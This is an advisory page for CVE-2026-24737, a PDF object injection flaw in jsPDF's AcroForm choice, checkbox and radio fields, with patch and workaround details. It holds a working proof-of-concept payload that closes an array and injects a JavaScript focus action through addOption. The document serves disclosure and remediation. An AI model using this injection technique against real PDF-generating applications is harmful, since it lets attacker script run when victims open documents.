CVE-2026-24737
jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution
Description
### Impact User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are: * `AcroformChoiceField.addOption` * `AcroformChoiceField.setOptions` * `AcroFormCheckBox.appearanceState` * `AcroFormRadioButton.appearanceState` Example attack vector: ```js import { jsPDF } from "jspdf" const doc = new jsPDF(); var choiceField = new doc.AcroFormChoiceField(); choiceField.T = "VulnerableField"; choiceField.x = 20; choiceField.y = 20; choiceField.width = 100; choiceField.height = 20; // PAYLOAD: // 1. Starts with "/" to bypass escaping. // 2. "dummy]" closes the array. // 3. "/AA" injects an Additional Action (Focus event). // 4. "/JS" executes arbitrary JavaScript. const payload = "/dummy] /AA << /Fo << /S /JavaScript /JS (app.alert('XSS')) >> >> /Garbage ["; choiceField.addOption(payload); doc.addField(choiceField); doc.save("test.pdf"); ``` ### Patches The vulnerability has been fixed in jsPDF@4.1.0. ### Workarounds Sanitize user input before passing it to the vulnerable API members. ### Credits Research and fix: Ahmet Artuç
How to fix CVE-2026-24737
To remediate CVE-2026-24737, upgrade the affected package to a fixed version below.
- —upgrade to 4.1.0 or later
Is CVE-2026-24737 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 4.1.0